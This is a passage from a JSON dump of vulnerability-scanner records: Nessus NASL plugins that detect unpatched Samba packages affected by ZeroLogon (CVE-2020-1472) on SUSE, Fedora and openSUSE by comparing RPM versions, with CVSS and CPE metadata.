flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-debugsource-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T06:12:16", "description": "Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 4, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-09-24T00:00:00", "title": "Fedora 32 : 2:samba (2020-0be2776ed3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1472"], "modified": "2020-09-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2020-0BE2776ED3.NASL", "href": "https://www.tenable.com/plugins/nessus/140760", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-0be2776ed3.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140760);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/08\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"FEDORA\", value:\"2020-0be2776ed3\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n\n script_name(english:\"Fedora 32 : 2:samba (2020-0be2776ed3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-0be2776ed3\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/24\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"samba-4.12.7-0.fc32\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T08:17:17", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n - Update to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows\n server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes =\n CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known\n NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to\n MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of\n pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for\n schema mode fatal; (bso#14425);\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.", "edition": 4, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-09-30T00:00:00", "title": "openSUSE Security Update : samba (openSUSE-2020-1526)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1472"], "modified": "2020-09-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:samba-python3", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:samba-ceph", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel", "p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-dsdb-modules", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:samba-ceph-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:samba-python3-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit"], "id": "OPENSUSE-2020-1526.NASL", "href": "https://www.tenable.com/plugins/nessus/141072", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1526.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141072);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/08\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2020-1526)\");\n script_summary(english:\"Check for the openSUSE-2020-1526 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n - Update to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows\n server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes =\n CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known\n NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to\n MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of\n pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for\n schema mode fatal; (bso#14425);\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176579\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", 